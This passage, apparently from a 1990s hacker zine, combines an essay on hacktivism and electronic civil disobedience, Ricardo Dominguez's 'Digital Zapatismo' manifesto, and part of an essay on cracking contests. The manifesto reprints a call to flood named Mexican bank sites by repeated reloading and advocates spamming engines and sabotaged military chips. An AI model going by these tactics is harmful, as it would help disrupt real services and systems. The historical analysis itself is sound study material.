left and the right, have said is that the Zapatistas owe their survival at this point largely to a war of words. This war of words, in part, is the propaganda war that has been successfully unleashed by Zapatista leaders like Subcommandante Marcos as well as non-Zapatista supporters throughout Mexico and the world. Such propaganda and rhetoric has, of course, been transmitted through more traditional mass communication means, like through the newspaper La Jornada. 13 But quite a substantial component of this war of words has taken place on the Internet. Since January 1, 1994 there has been an explosion of the Zapatista Internet presence in the forms of email Cc: lists, newsgroups, discussion lists, and web sites.14 A primary distinction, then, between earlier forms of computerized activism and forms of grassroots infowar is in the degree of intensity. Coupled with that is the degree to which the participants are noticed and seen as a force. Given the Zapatistas relatively high profile in Mexican society over the course of the last five years, and given the fact that they are technically a belligerent force negotiating with a government, the Internet activity surrounding them takes on a different significance than, say, for example, the Internet activity of the Sierra Club, Amnesty International, or other similar ventures. An important difference is that in grassroots infowar comes the desire to incite action and the ability to do so at a global scale. At the end of 1997, news of the Acteal massacre in Chiapas, in which 45 indigenous people were killed, quickly spread through global pro-Zapatista Internet networks. Within a matter of days there were protests and actions at Mexican consulates and embassies all over the world.15 This incident, too, is now seen as a turning point in the stance by some toward the Internet infrastructure. While prior to this moment, there had been few if any incident reports of pro-Zapatista hacktivity, following there has been a shift, the beginning of the move toward accepting the Internet infrastructure as both a channel for communication and a site for action. Electronic Civil Disobedience Acting in the tradition of non-violent direct action and civil disobedience, proponents of Electronic Civil Disobedience are borrowing the tactics of trespass and blockade from these earlier social movements and are experimentally applying them to the Internet. A typical civil disobedience tactic has been for a group of people to physically blockade, with their bodies, the entranceways of an opponent's office or building or to physically occupy an opponent's office -- to have a sit-in. Electronic Civil Disobedience, as a form of mass decentered electronic direct action, utilizes virtual blockades and virtual sit-ins. Unlike the participant in a traditional civil disobedience action, an ECD actor can participate in virtual blockades and sit-ins from home, from work, from the university, or from other points of access to the Net. [16] The phrase "Electronic Civil Disobedience" was coined by a group of artists and theorists called the Critical Art Ensemble. In 1994 they published their first book that dealt with this subject, "The Electronic Disturbance," followed two years later by "Electronic Civil Disobedience and Other Unpopular Ideas."16 Both of these works are devoted to a theoretical exploration of how to move protests from the streets onto the Internet. They examine the tactics of street protest, on-the-ground disruptions and disturbance of urban infrastructure and they hypothesize how such practices can be applied to the Internet infrastructure.17 Before 1998, Electronic Civil Disobedience remained largely as theoretical musings. But after the 1997 Acteal Massacre in Chiapas, there was a shift toward a more hybrid position that views the Internet infrastructure as both a means for communication and a site for direct action. This shift distinguishes more sharply the third portal of Electronic Civil Disobedience from the first and second portals. Electronic Civil Disobedience is the first transgression, making Politicized Hacking the second transgression and Resistance to Future War the third. Each succeeding transgression moves the stance toward the Internet infrastructure further away from the public sphere model and casts it more as conflicted territory bordering on a war zone. Where the former more discursive model is perhaps a manifestation of Habermas's Paris Salon, the later may have roots in the Boston Tea Party. 18 The realization and legitimization of the Internet infrastructure as a site for word and deed opens up new possibilities for Net politics, especially for those already predisposed to extraparliamentarian and direct action social movement tactics. In early 1998 a small group calling themselves the Electronic Disturbance Theater had been watching other people experimenting with early forms of virtual sit-ins. The group then created software called FloodNet and on a number of occasions has invited mass participation in its virtual sit-ins against the Mexican government. 19 EDT members Carmin Karasic and Brett Stalbaum created FloodNet to direct a "symbolic gesture" against an opponent's web site. FloodNet is a Web-based Java applet that repeatedly sends browser reload commands.20 In theory, when enough EDT participants are simultaneously pointing the FloodNet URL toward an opponent site, a critical mass prevents further entry. Actually, this has been rarely attained. Given this, perhaps FloodNet's power lies more in the simulated threat. On September 9, 1998, EDT exhibited its SWARM project21 at the Ars Electronic Festival on Information Warfare, where it launched a three-pronged FloodNet disturbance against web sites of the Mexican presidency, the Frankfurt Stock Exchange, and the Pentagon, to demonstrate international support for the Zapatistas, against the Mexican government, against the U.S. military, and against a symbol of international capital.22 But within several hours of activating project SWARM, FloodNet was disabled. On web browsers Java coffee cups streamed quickly across the bottom of the screen and FloodNet froze. Participants began to send email with word of trouble. Later that day a Wired writer learned from a Department of Defense spokesperson that the DOD had taken some steps against FloodNet. At the same time, an EDT co-founder received email that the Defense Information Systems Agency had complained about his ECD web site content.23 Globally, 20,000 connected to the FloodNet browser on September 9 and 10. This action reverberated through European media. It was later picked up by Wired, ZDTV, Defense News, and National Public Radio, among others. On October 31, EDT made the front page of the New York Times. The story continued to unfold. More interest from the media sphere. On November 22, EDT called for FloodNet against the School of the Americas.24 As part of EDT's grande finale for the 1998 season, the group plans to release a public version of FloodNet at 12:01 a.m. on January 1, 1999. Politicized Hacking Again mentioning Mexico, in addition to the Electronic Civil Disobedience style action directed at the surface, at the web site entranceway, there have also been in 1998 actually hacks into Mexican government web sites where political messages have been added to those sites. 25 This particular tactic of accessing and altering web sites seems to have been the popular tactic for this year. Probably one of the most well known examples of this is the story of the young British hacker named "JF" who hacked into around 300 web sites world wide and placed anti-nuclear imagery and text. This method has been tried by a number of groups. October issues of the Ottawa Citizen and the New York Times did a decent job of capturing a number of these examples as they described this new trend. 26 One main distinction between most Politicized Hacking and the type of Electronic Civil Disobedience just mentioned is that while ECD actors don’t hide their names, operating freely and above board, most political hacks are done by people who wish to remain anonymous. It is also likely political hacks are done by individuals rather than by specific groups. One of the reasons for the anonymity and secrecy is that the stakes are higher. Where proponents of forms of electronic civil disobedience actions are perhaps in an ambiguous area of law, certain types of political hacks, used to varying degrees of success, are unquestionably illegal. Few will question the legality of actually entering into an opponent's computer and adding or changing HTML code. This distinction speaks to a different style of organization. Because of the more secret, private, low key, and anonymous nature of the politicized hacks, this type of activity expresses a different kind of politics. It is not the politics of mobilization, nor the politics that requires mass participation. This is said not to pass judgement, but to illuminate that there are several important forms of direct action Net politics already being shaped. As touched on already, depending on the conception of politics, politicized hacking is either a recent phenomena or one that can be traced back to hacking's origins. For the purposes of creating a portal to look into this world of extraparliamentarian direct action Net politics, it may be useful to consider both perspectives. There is clearly something political about early hackers' desires to make information free. It probably would be useful to examine the history of early to mid 1980s hacking to look for more political origins of today's hacktivism. The computerized activism of the mid to late 1980s existed alongside the first generation of hackers. There may have been cross-over then. The contemporary conception of hacktivism seems to concern itself more with overtly political hacking. It is such a recent development that journalists have only barely begun to discover it, while scholars have had little time to consider it. There are numerous web sites devoted to hacking, but very few are devoted to Hacktivism per se. Although, one web site devoted to Hacktivism was created in the fall of 1998 by a group called The Cult of the Dead Cow. 27 An important fact to realize and emphasize is that hacktivism, current forms of politicized hacking, is very much in its infancy. It is too early to draw definitive conclusions or to make strong predictions as to the direction it will take. Perhaps we can point to certain trajectories and make some logical projections. But we need to remember that at this point there is no consensus or agreement. Maybe the entire notion of hacktivism confuses and challenges sets of values and hacker codes of ethics. Quite possibly there is some re-thinking happening and we might begin to see a new set of ethical codes for hacking.28 Resistance to Future War Some call the 1990-1991 Gulf War the first Information War because of the heavy military reliance on information and communication technology. The Gulf War was a pinnacle of achievement for the weapons industry, a chance to battle test sophisticated hardware that had been developed and manufactured under the Reagan and Bush presidencies. The weapons systems were dependent, as were all communications, on a major telecommunications infrastructure involving satellite, radar, radio, and telephone. The "smart" bombs were just the most mentioned of the sophisticated weaponry that was showcased during the made-for-CNN war. Although significantly under-reported by mainstream U.S. media, there was sizeable domestic opposition to the Gulf War, both prior to and especially during the first days of U.S. bombing of Iraq. In San Francisco, the first three days of the Gulf War are referred to as the Three Days of Rage. During that period, demonstrators filled, occupied, and controlled the streets and in some cases bridges and highways in the greater San Francisco Bay Area. Similar disruptions happened up and down the west coast and all across the country. There was widespread grassroots resistance to the U.S. bombardment of Iraq in January 1991.29 One part of that history is the role of information and communication technology, not just for the military forces, but also for the grassroots resistance. If the Gulf War is indicative of a paradigmatic shift toward the practice of Information Warfare, then it's also useful to look at the way in which ICT enabled resistance to the war effort. Some people within the opposition to the 1990-1991 Gulf War used email to communicate and they learned about resistance in other cities through Bulletin Board Systems and newsgroups. Others without computer access used fax and telephone. But many people had no connection to computers and received nothing by fax, instead they came out into the streets because of seeing posters or by hearing announcements on TV or on radio, or through word of mouth. It is safe to say that the Internet played only a marginal role in spreading news and moving people into action. The opposition to the war also watched CNN just like everyone else. But that was the end of 1990 and the very beginning of 1991, 8 years ago at the time of this writing, and in a pre-Web phase and even pre-Internet phase. Yes, by then the PC revolution had exploded and more and more people were buying modems, but the Gulf War is clearly positioned in the pre-boom days of the Internet in the United States. An interesting question is what would happen today, or moreover, what might happen tomorrow or in the near future, if presented with a similar set of circumstances. What if, for example, a Gulf War-like scenario emerged at the end of the year 2000 and the beginning of 2001? Suppose the United States decided to engage in what became an unpopular war, what might hacktivism look like in a condition of more generalized resistance? Or said another way, what might generalized resistance look like with the condition of hacktivism? The above is what is meant to be asked by suggesting that Resistance to Future War is the fifth portal into direct action Net politics. Where might this all lead? Until now, incidents of hacktivity have been sporadic and basically unconnected. Hacktivist events have been singular and not connected to a set of simultaneous occurrences. Perhaps the Electronic Disturbance Theater's work demonstrates the possibility of waging a campaign on the Internet, and sustaining a presence over a period of time. But the group's one goal of a SWARM has yet to be achieved. Maybe it is useful to think of the SWARM metaphor in the consideration of Resistance to Future War. Perhaps a SWARM is a convergence of generalized resistance, referring to a situation in which there are not just isolated cases, or several pockets of opposition, but when there is across-the-board resistance occurring at a number of different levels and happening in cities and towns all across the country, all at the same time. Such was the case during moments of domestic Gulf War resistance. There was a simultaneous outpouring of people into the streets who engaged in quite a range of activity, both legal and illegal. A multitude of tactics were being used at the same time but without any central command or directing orders from above. Incidents of such upsurge are rare, but they undoubtedly will occur again. What will hacktivism look like then? What of it when hacktivism moves from isolated incidents to a convergence of allied forces? Is this when hacktivism ceases to be and becomes cyberspacial resistance? While it may be too early to make accurate predictions, it seems true that the force or power of hacktivism has yet to be fully recognized or tested. Yet before getting lost in futuristic science fiction, consider some critiques. Emerging Critiques of Direct Action Net Politics There is no consensus among social and political activists regarding electronic civil disobedience, political hacking, hacktivism, or more generally extraparliamentarian direct action Net politics. It may in fact be too early to judge or to make definitive claims about these new tactics, but some critiques have co-developed along with the development of these new methods. They point to some basic questions over the effectiveness and appropriateness of these forms of electronic action. In an emerging discourse on several email listservs, that is too complicated to treat fairly in such a short piece as this one, there have been periodic criticisms raised both generally and specifically about aspects of the above mentioned tactics.30 By no means can this piece attempt to describe and comment on all criticisms being raised about hacktivism et al, but it can at least address several of the criticism raised that seem most important. As already stated there are critiques aimed at the effectiveness and the appropriateness of cyber-protests. In terms of effectiveness, three closely related types of questions have appeared regarding political, tactical, and technical effectiveness. Concerning appropriateness there are ethical questions, that may be also considered as political questions, and of course there are legal questions. Some of the legal concerns raise issues of enforceability and prosecuteability. Political and tactical effectiveness are closely intertwined. Are these methods of computerized activism effective? The answer to which is, that it depends on how effectiveness is defined. What is effective? If the desired goal of hacktivism is to draw attention to particular issues by engaging in actions that are unusual and will attract some degree of media coverage, then effectiveness can be seen as being high. If, however, effectiveness is measured in terms of assessing the actions ability to be a catalyst for fomenting a more profound mobilization of people, then probably these new techniques are not effective. This distinction then, perhaps, is important. Hacktivism is not likely to be an organizing tool and the end result of hacktivity is not likely to be an increase in the ranks of the disaffected. Rather hacktivism appears to be a means to augment or supplement existing organizing efforts, a way to make some noise and focus attention. Technical critiques of hacktivism at the level of computer code are another way of addressing the efficacy of these new methods. Undoubtedly there will be disagreement as to how effective a particular technique is or isn't. But it seems that if new methods are created in an environment of experimentation, then valid critiques will be taken into consideration and used to redesign or alter plans and strategies. However, there are some technical critiques that are actually much more ideologically based than it would first seem. For example there is a certain tendency to reify bandwidth and from that viewpoint any action that clogs or diminishes bandwidth is considered negative. So then, technical critiques can be value-laden with particular stances toward the Internet infrastructure. Despite the current levels of political, tactical, and technical questions that are being raised about hacktivism et al, it seems to be an area that is in a period of expansion, rather than contraction. And it generally seems that this critique and questioning is healthy and useful for the refinement of the practice. As just mentioned, some technical critiques are bound together with ideological pre-dispositions and are therefore also political questions, and perhaps even ethical questions of appropriateness. To judge blocking a web site, or clogging the pipelines leading up to a web site, is to take an ethical position. If the judgement goes against such activity, such an ethical position is likely to be derived from an ethical code that values free and open access to information. But there are alternative sets of values that justifies, for example, the blocking of access to web sites. These differences in beliefs over the nature of the Internet infrastructure are among people who are basically on the same side when it comes to most political questions. Some of these differences will probably be worked out as the subject and practice matures, while there may remain clear divisions. Last but not least, the more prosecutorial minded are apt to pass judgement on the appropriateness or inappropriateness of certain forms of hacktivism based on where the actions stand with respect to the law. While it is true that some forms of hacktivity are fairly easy to see as being outside the bounds of law - such as entering into systems to destroy data - there are other forms that are more ambiguous and hover much closer to the boundary between the legal and the illegal. Coupled with this ambiguity are other factors that tend to cloud the enforceability or prosecuteability of particular hacktivist offenses. Jurisdictional factors are key here. The nature of cyberspace is extraterritorial. People can easily act across geographic political borders, as those borders do not show themselves in the terrain. Law enforcement is still bound to particular geographic zones. So there is a conflict between the new capabilities of political actors and the old system to which the law is still attached. This is already beginning to change and legal frameworks, at the international level, will be mapped on to cyberspace. This section does not do justice to the full range of critiques that can be identified and described, and further exploration of the subject of direct action Net politics should make sure such a deeper analysis is taken. The intention here has been more so to develop a greater understanding of these new forms of electronic action and to only mention a few overarching critiques so as to not give the impression that this is moving forward without resistance. Quite the contrary is true. It seems that hacktivity has met and will meet resistance from many quarters. It doesn't seem as if opposition to hacktivist ideas and practices falls along particular ideological lines either. Conclusion Several things seem to be clear at this point. The first is that hacktivism, as defined across the full spectrum from relatively harmless computerized activism to potentially dangerous resistance to future war, is a phenomena that is on the rise. Second, as just eluded to, hacktivism represents a spectrum of possibilities that exists in some combination of word and deed. On the one end of the spectrum is pure word. On the other end of the spectrum is pure deed. Computerized activism hovers closer to pure word, while the successive portals moves closer toward pure deed. Third, along with this tendency towards transgression, towards giving value to actions that move beyond words and that sees the Internet infrastructure also as a site for action, there comes with this a critique and resistance. Despite this critique hacktivism is likely to continue to spread, but perhaps modified to accommodate some of the criticism. Fourth, with its continued spread, modified by critique or not, hacktivism is also likely to continue to gain attention. While media coverage may eventually drop off if or when hacktivism becomes more commonplace, at this point the way in which hacktivism is being represented is still new enough to warrant media attention for the foreseeable near future. What remains unclear about hacktivism emerges when we start to ask questions like: what does this mean and where is this going? While we can claim with a fair degree of certainty that hacktivism is on the rise, there is little way to tell where it will lead to and the significance or lack there of that it will or might obtain. Moreover, there are aspects of hacktivism that still need to be explored. For example, the entire issue of extraterritoriality, of the Internet not being bound to any particular geographic region and the difficulties that poses for law enforcement, is one area that deserves further attention. One reason why it is difficult to get a firm grip on hacktivism's direction, in addition to simply saying that it is too early to tell, is that hacktivism will evolve in response to changing global economic and political conditions. As it is hard to predict trends and directions in the global economy, it too, then, becomes hard to predict events that will be linked to those meta shifts. Nevertheless, some people are trying to understand and make sense out of where hacktivism could go, although they might not be doing so using the particular word 'hacktivism' to describe this activity. Governments and corporations are keenly concerned, for example, about network security. To get some indications about the forecast for hacktivism in the 21st century it may be very useful to examine what these sorts of institutions are saying and how they are preparing to defend themselves. It could very well be that governments might impose severe regimes that successfully curtail hacktivism. If so, 1998 might be seen at some point as the glory days, when hacktivist experiments were able to go largely unchallenged, because the mechanisms of the state had not yet been in place to deal with the new phenomena. Or it could be that hacktivism is able to successfully remain several steps out in front of law enforcement efforts, or that too many people become involved that enforceability remains problematic. Again, it is difficult to know any of this. Finally, while we can speak with some clarity about facets of hacktivism and also point to aspects of it that remain ambiguous and unforeseen, there is an overarching concern that comes from this discussion that deserves more attention. Specifically arising out of the consideration of the fifth portal, Resistance to Future War, what are the long term consequences posed for governments and states if individuals, non-state actors, can engage in forms of cyberspacial resistance across traditional geo-political borders? This is an important question raised by this discussion and one that demands more attention to answer properly. But it seems clear already that we are at the onset of a new way of thinking about, participating in, and resisting war, and that today's nascent hacktivity is part of the trajectory towards that new way. Footnotes 1. Amy Harmon, "'Hacktivists' of All Persuasions Take Their Struggle to the Web," New York Times, 31 October 1998, sec. A1; Same in Carmin Karasic scrapbook (http://custwww.xensei.com/users/carmin/scrapbook/nyt103198/31hack.html) 2. John D. H Downing, "Computers for Political Change: PeaceNet and Public Data Access," Journal of Communication 39, no. 3 (Summer 1989): 154-62. 3. Harry Cleaver, "The Zapatistas and the International Circulation of Struggle: Lessons Suggested and Problems Raised," Harry Cleaver homepage 1998 (http://www.eco.utexas.edu/faculty/Cleaver/lessons.html) 4. Kenneth L. Hacker, "Missing links in the evolution of electronic democratization," Media, Culture & Society 18, (1996): 213-32; Lewis A. Friedland, "Electronic democracy and the new citizenship," Media, Culture & Society 18, (1996): 185-212; John Street, "Remote Control? Politics, Technology and 'Electronic Democracy'," European Journal of Communication 12, no. 1 (1997): 27-42. 5. John D. H Downing, "Computers for Political Change: PeaceNet and Public Data Access," Journal of Communication 39, no. 3 (Summer 1989): 154-62. 6. Linda M. Harasim, ed., Global Networks: Computers and International Communication (Cambridge, Mass.: MIT Press 1993) 7. There are many protest web sites. Trying a search on keywords "protest" and "web site" and there will be thousands of hits. 8. John Arquilla and David Ronfeldt, "Cyberwar is Coming!," Comparative Strategy 12 (April-June 1993): 141-65.; (http://gopher.well.sf.ca.us:70/0/Military/cyberwar) 9. Cleaver, Harry "The Zapatistas and The Electronic Fabric of Struggle," Harry Cleaver homepage 1995 (http://www.eco.utexas.edu/faculty/Cleaver/zaps.html) 10. Gerfried Stocker and Christine Schopf, eds. InfoWar (Wien, Austria: Springer 1998); Ars Electronica Festival 1998 (http://www.aec.at/infowar) 11. Stefan Wray, "Towards Bottom-Up Information Warfare: Theory and Practice: Version 1.0," Electronic Civil Disobedience Archive 1998 (http://www.nyu.edu/projects/wray/BottomUp.html) 12. Stefan Wray, "The Drug War and Information Warfare in Mexico," Masters Thesis, University of Texas at Austin, Electronic Civil Disobedience Archive 1997 (http://www.nyu.edu/projects/wray/masters.html) 13. La Jornada (http://serpiente.dgsca.unam.mx/jornada/index.html) 14. Harry Cleaver, "Zapatistas in Cyberspace: An Accion Zapatista Report," Harry Cleaver homepage 1998 (http://www.eco.utexas.edu/faculty/Cleaver/zapsincyber.html) 15. No specific reference to this fact. But it is a matter of record. 16. Stefan Wray, "On Electronic Civil Disobedience," Peace Review 11, no. 1, (1999), forthcoming; Electronic Civil Disobedience archive 1998 (http://www.nyu.edu/projects/wray/oecd.html) 17. Critical Art Ensemble, The Electronic Disturbance (Brooklyn, NY: Autonomedia 1994); Critical Art Ensemble, Electronic Civil Disobedience and Other Unpopular Ideas (Brooklyn, NY: Autonomedia 1996); Critical Art Ensemble homepage (http://mailer.fsu.edu/~sbarnes/) 18. Stefan Wray, "Paris Salon or Boston Tea Party? Recasting Electronic Democracy, A View from Amsterdam," Electronic Civil Disobedience archive 1998 (http://www.nyu.edu/projects/wray/teaparty.html) 19. Electronic Disturbance Theater homepage (http://www.thng.net/~rdom/ecd/ecd.html) 20. Brett Stalbaum, "The Zapatista Tactical FloodNet," Electronic Civil Disobedience Web Page 1998 (http://www.nyu.edu/projects/wray/ZapTactFlood.html) 21. Ricardo Dominguez, "SWARM: An ECD Project for Ars Electronica Festival '98," Ricardo Dominguez homepage 1998 (http://www.thing.net/~rdom/) 22. Electronic Disturbance Theater, "Chronology of SWARM," (http://www.nyu.edu/projects/wray/CHRON.html) 23. "Email Message From DISA to NYU Computer Security," Electronic Civil Disobedience homepage (http://www.nyu.edu/projects/wray/memo.html) 24. Electronic Disturbance Theater's call for Electronic Civil Disobedience on November 22, 1998 (http://www.thing.net/~rdom/ecd/November22.html); (http://www.thing.net/~rdom/ecd/block.html) 25. "Mexico rebel supporters hack government home page," Reuters, 4 February 1998; Same in Electronic Civil Disobedience homepage (http://www.nyu.edu/projects/wray/real.html) 26. Amy Harmon, "'Hacktivists' of All Persuasions Take Their Struggle to the Web," New York Times, 31 October 1998, sec. A1; Same in Carmin Karasic scrapbook (http://custwww.xensei.com/users/carmin/scrapbook/nyt103198/31hack.html); Bob Paquin, "E-Guerrillas in the mist," The Ottawa Citizen, 26 October 1998 (http://www.ottawacitizen.com/hightech/981026/1964496.html) 27. Hacktivism web page (http://www.hacktivism.org); Cult of the Dead Cow homepage (http://www.cultdeadcow.com/) 28. While it is possible to point to certain early hacker ethical codes that, for example, privilege free and open access to all, there is not a monolithic hacker's perspective. Nevertheless, some whom call themselves hackers have criticized the FloodNet project because one of the things they allege it does is block bandwidth. This view can be said to be a digitally correct position. 29. The author knows about grassroots resistance to the 1990/1991 Gulf War because he was involved in anti-war organizing and action in the San Francisco Bay Area during this period. 30.Some of these listservs include: nyfma@tao.ca, damn-org@tao.ca, media-l@tao.ca, accion-zapatista@mcfeeley.cc.utexas.edu SP.02 "Digital Zapatismo" ~~~~~~~~~~~~~~~~~~~ Digital Zapatismo http://www.freespeech.org/resistance/texts/DigZap.html by Ricardo Dominguez http://www.thing.net/~rdom/ Zapatismo has infected the political body of Mexico's "perfect dictatorship" since January 1, 1994. This polyspacial movement for a radical democracy based on the Mayan legacies of dialogue ripped into the electronic fabric not as InfoWar--but as virtual actions for real peace in the real communities of Chiapas. As of September 1997 reports of The Mexican military training and arming paramilitary groups with the intent of moving the "low-intensity" war to higher level began to circulate among the Zapatista Network. It took the massacres at Acteal to focus the world on something that was already known--the constant tragedy of late-capital. As manifestations took place around the world in remembrance of the Acteal dead on January 1 and 2nd, the Mexican military with the full support of the PRI government began the next stage of the war against peace. As the West stumbled about in celebration of a new year--the first report reached out across the net and slapped us awake once more with the brutal reality of the neo-liberal agenda. 1.0 Beta Actions This time Zapatista Networks responded with a new level of electronic civil disobedience beyond the passing of information and emailing presidents. On Sunday the 18th of January 1998 a call for NetStriking for Zapata (from Anonymous Digital Coalition) came in via email with the following instructions: In solidarity with the Zapatista movement we welcome all netsurfers with ideals of justice, freedom, solidarity and liberty within their hearts, to a virtual sit-in. On January 29, 1998 from 4:00 p.m. GMT (Greenwich Mean Time) to 5:00 p.m. (in the following five web sites, symbols of Mexican neoliberalism): Bolsa Mexicana de Valores: http://www.bmv.com.mx Grupo Financiero Bital: http://www.bital.com.mx Grupo Financiero Bancomer: http://www.bancomer.com.mx Banco de Mexico: http://www.banxico.org.mx Banamex: http://www.banamex.com Technical instructions: Connect with your browser to the upper mentioned web sites and push the bottom "reload" several times for an hour (with in between an interval of few seconds). This virtual sit-in not only brought the possibilities of direct electronic actions to the forefront of the Zapatista networks, it also initiated a more focused analysis of what methods of electronic civil disobedience might work. Several questions were brought up on the issues of net traffic, ISPs, and small international pipes. Speculations on the technological implications of these actions began to focus on questions of Who is most likely to be damaged by this move? The Mexican target banks or the Internet Service Providers, ISPs, who route data to these banks? As these discussions were taking place a group of Mexican digital activist on February 4, 1998 hacked into a Mexican government home page on the Internet and placed pro-Zapatista slogans on the front pages of the site. Soon afterwards an MS Dos Ping Action program from the ECD group arrived to hit Mexican Banks and Chase Manhattan Bank on February 9. The next level of possible ECD began to emerge at the end of February: an automatic mail engine from the New Humans and Java based site that automatically began to PING the Britsh Mexican Embassy URL every 7 seconds once you logged-in. 2.0 InfoWar To move beyond these Beta actions we need to map the general condition of InfoWar at this shifting point in time. Command and control systems (CCS) within the Military and Intelligence Communities have been re-shifting their definition of war for sometime. That surveillance systems like Project Echelon would become a priority is no surprise. The NSA (National Security Agency) and the (NRO) National Reconnaissance Office have been working on implementing new functions for themselves since the end of the post-Cold War. They had to re-invent themselves into hyper-surveillance networks that can accomplish defensive intelligence gathering and rapid containment missions for the lowest cost possible. Now it is more important to attack an opponents information infrastructure, than it is to destroy its armies. Actions, like the Gulf War, are now only useful for limited screenal political gambits. The enemy is now hosted by the global public commercial networks. InfoWar tactics must now maintain a constant analysis of all information flows and a continuous tracking of the backbone routes. In search of the most effective way to bring down specific zones of resistance within an enemies political or economic structures: 1. Commercial communication systems. 2. Broadcasting networks. 3. Financial data systems. 4. Transportation systems 5. Internet Server networks. Of course one of the problems faced by these IW scenarios is that military and intelligence systems here are also routed within public commercial lines. The scenarios of possible implosions faced by the decentralization of command and control are increasing at a co-equal rate with the speed of access to hardware, software, and training. Late Capital demands that this equation grow even faster and to the farthest reaches of the globe. The necessity of the rule of association and strategic coalitions between military and intelligence networks with mega corporation webs, universities, independent ISP´s, electronic political cells, individual research and analysis creates a general state of pan-anarchy. Thus IWW (Information World War) has already started and it is haunted by its own shadow. It must face the task of dealing with an open network that has at least 5 vulnerabilities: 1. Bottom-up architecture. 2. Multiple distribution points. 3. Memetic networks (MMN): independent networks which coordinate without the unification of a central command. 4. Non linearity and complexity effects: where simple interactions lead to unpredictable outcomes. 5. Constant states of emergency: all systems are always already not enough and must be constantly upgraded. In order to deal with this growing vulnerability of the electronic infrastructure with the on set InfoWar. The State has redefined command, control, intelligence and resistance. InfoWar tactics are now moving beyond the theoretical questions about the rise of "network power" and the end of hierarchies. Instead, Military and Intelligence groups are now experimenting with pragmatic hybrid structures that can retain control over networks, while allowing network autonomy to expand within a specific types of command structures. In order to contain the rising soft power of small groups that can organize themselves "into sprawling networks" threatening hard power structures. 3.0 Hacking the Future Digital Zapatismo has always been an open system of sprawling networks—this has been the force multiplier of the movement. It used digital cultures most basic system of exchange, e-mail between people to disturb the Informatic State. Now that we know that they are using, as we always suspected, hyper-surveillance filters to regain control of the network. We must begin to invent other methods of Electronic Civil Disobedience: 1. Alternative networks with more access and bandwidth. More projects like Name.space attacking the control of the root.name structures by Internic. 2. Deep programming: Creating Spiders, Bots, and other (minor network agents) to move against specific URLs without interrupting the Server. The first Zapatista Spider should be available by the end of May. 3. Offshore Domains: To maintain spamming engines for massive e-mail actions. 4. Virtual proximity capabilities: Create simple access systems for Real Time intercontinental electronic communication. These types of systems would disable the possibility of surveillance. A proto-type has been developed by Thing.net—The Thing Connector 3.0. 5. Satellites: To gather a fund among alternative networks to buy our own Satellite. Giving us autonomy from controlled networks and backbones. The Nettime community has been discussing the possibility. 6. Jamming Chips: Jamming by cells of highly trained cells could systematically disrupt wide areas of sensitive networks. These micro-squads could slip basic disturbances into the chips bought by the U.S military-entertainment complex from foreign countries. Many of these elements are part of a wide range of defensive and offensive weapon systems--that could induce a general dysfunction in performance at a pre-set time. The Zapatista Networks, in the spirit of Chiapas are developing methods of electronic disturbance as sites of invention and political action for peace. At this point in time it is difficult to know how much of a disturbance these acts of electronic civil disobedience specifically make. What we do know is that neoliberal power is extremely concerned by these acts. Since Jan 1, 1994 the analysis of the Zapatista Electronic Movement has been at the top of the list of the Military and Intelligence research agenda. For now all we can do is continue to forge ahead and always remember that all of this electronic activism is about a real community in search of a real peace. A community that has been calling for a world the makes all worlds possible. @copyleft Electronic Civil Disobedience Homepage @HWA SP.C1 The Phallusy of cracking contests, (how big is yours?) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Fallacy of Cracking Contests You see them all the time: "Company X offers $1,000,000 to anyone who can break through their firewall/crack their algorithm/make a fraudulent transaction using their protocol/do whatever." These are cracking contests, and they're supposed to show how strong and secure the target of the contests are. The logic goes something like this: We offered a prize to break the target, and no one did. This means that the target is secure. It doesn't. Contests are a terrible way to demonstrate security. A product/system/protocol/algorithm that has survived a contest unbroken is not obviously more trustworthy than one that has not been the subject of a contest. The best products/systems/protocols/algorithms available today have not been the subjects of any contests, and probably never will be. Contests generally don't produce useful data. There are three basic reasons why this is so. 1. The contests are generally unfair. Cryptanalysis assumes that the attacker knows everything except the secret. He has access to the algorithms and protocols, the source code, everything. He knows the ciphertext and the plaintext. He may even know something about the key. And a cryptanalytic result can be anything. It can be a complete break: a result that breaks the security in a reasonable amount of time. It can be a theoretical break: a result that doesn't work "operationally," but still shows that the security isn't as good as advertised. It can be anything in between. Most cryptanalysis contests have arbitrary rules. They define what the attacker has to work with, and how a successful break looks. Jaws Technologies provided a ciphertext file and, without explaining how their algorithm worked, offered a prize to anyone who could recover the plaintext. This isn't how real cryptanalysis works; if no one wins the contest, it means nothing. Most contests don't disclose the algorithm. And since most cryptanalysts don't have the skills for reverse-engineering (I find it tedious and boring), they never bother analyzing the systems. This is why COMP128, CMEA, ORYX, the Firewire cipher, the DVD cipher, and the Netscape PRNG were all broken within months of their disclosure (despite the fact that some of them have been widely deployed for many years); once the algorithm is revealed, it's easy to see the flaw, but it might take years before someone bothers to reverse-engineer the algorithm and publish it. Contests don't help. (Of course, the above paragraph does not hold true for the military. There are countless examples successful reverse-engineering--VENONA, PURPLE--in the "real" world. But the academic world doesn't work that way, fortunately or unfortunately.) Unfair contests aren't new. Back in the mid-1980s, the authors of an encryption algorithm called FEAL issued a contest. They provided a ciphertext file, and offered a prize to the first person to recover the plaintext. The algorithm has been repeatedly broken by cryptographers, through differential and then linear cryptanalysis and by other statistical attacks. Everyone agrees that the algorithm was badly flawed. Still, no one won the contest. 2. The analysis is not controlled. Contests are random tests. Do ten people, each working 100 hours to win the contest, count as 1000 hours of analysis? Or did they all try the same things? Are they even competent analysts, or are they just random people who heard about the contest and wanted to try their luck? Just because no one wins a contest doesn't mean the target is secure...it just means that no one won. 3. Contest prizes are rarely good incentives. Cryptanalysis of an algorithm, protocol, or system can be a lot of work. People who are good at it are going to do the work for a variety of reasons--money, prestige, boredom--but trying to win a contest is rarely one of them. Contests are viewed in the community with skepticism: most companies that sponsor contests are not known, and people don't believe that they will judge the results fairly. And trying to win a contest is no sure thing: someone could beat you, leaving you nothing to show for your efforts. Cryptanalysts are much better off analyzing systems where they are being paid for their analysis work, or systems for which they can publish a paper explaining their results. Just look at the economics. Taken at a conservative $125 an hour for a competent cryptanalyst, a $10K prize pays for two weeks of work, not enough time to even dig through the code. A $100K prize might be worth a look, but reverse-engineering the product is boring and that's still not enough time to do a thorough job. A prize of $1M starts to become interesting, but most companies can't afford to offer that. And the cryptanalyst has no guarantee of getting paid: he may not find anything, he may get beaten to the attack and lose out to someone else, or the company might not even pay. Why should a cryptanalyst donate his time (and good name) to the company's publicity campaign? Cryptanalysis contests are generally nothing more than a publicity tool. Sponsoring a contest, even a fair one, is no 